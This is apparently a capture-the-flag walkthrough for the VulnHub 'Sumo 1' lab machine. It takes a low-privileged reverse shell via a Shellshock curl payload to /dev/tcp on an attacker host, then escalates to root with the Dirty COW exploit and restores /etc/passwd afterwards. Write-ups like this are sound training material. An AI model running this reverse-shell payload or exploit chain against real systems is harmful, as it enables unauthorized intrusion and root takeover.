https://www.vulnhub.com/entry/sumo-1,480/
System Info
- Ubuntu 12.04 LTS
Discover Target Network
sudo nmap -sn 192.168.122.0-255
nmap -p- 192.168.122.113
Port 80
- not much to see on the website, other than it is running apache 2.2.22
ShellShock
https://www.sevenlayers.com/index.php/125-exploiting-shellshock
use
nikto -host 192.168.122.113
to scan for webserver vulnerabilities.it shows that
/cgi-bin/test
,/cgi-bin/test.sh
,/cgi-bin/test/test.cgi
is vulnerable to Shellshock vulnerabilityrunning:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi
to open a revese shell on port 7741 to host using TCP
- upgrade to a better shell using python2
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
- we are a very low privileged user, and not much misconfiguration to see.
- we can try running enumeration scripts like
linpeas.sh
, but target machine doesn’t have cURL. - download it onto host machine by
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
- open a simple http server using python3
python -m http.server 9999
cd /tmp
on target machine,wget http://192.168.122.101:9999/linpeas.sh && chmod +x linpeas.sh
Dirty COW
- running it will show us this kernel 3.2.0 is vulnerable to multiple exploit, the CVE we going to exploit is CVE-2016-5195, which allows local users to gain privileges by incorrect handling of a Copy-On-Write feature to write to a read only memory, name “Dirty COW”.
- the exploit we are going to use is https://github.com/firefart/dirtycow
- get it onto the host machine by
wget https://github.com/firefart/dirtycow/raw/master/dirty.c
- it has to need to be cross-complied for target system or compile on the target system.
- so get it onto the target machine using the same way as
linpeas.sh
- But if we try to compile using GNU C compiler on target system, we will get an error like:
Gcc error: gcc: error trying to exec 'cc1': execvp: No such file or directory
- locate
cc1
byfind / -name cc1 2> /dev/null
- add it to enviornmental variable by
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6/cc1
- now we can compile it using
gcc -pthread dirty.c -O2 -o dirty -lcrypt
- running it will prompt us for a new password for new user, enter anything.
- now we can SSH into the machine again with
ssh firefart@192.168.122.113
- eventhough our username is
firefart
, if we runid
, it shows that we are root!
Capture the Flag
cat /root/root.txt
Cleaning Up
- Because it replaced target system’s
/etc/passwd
file, to clean up we need to restore it bymv /tmp/passwd.bak /etc/passwd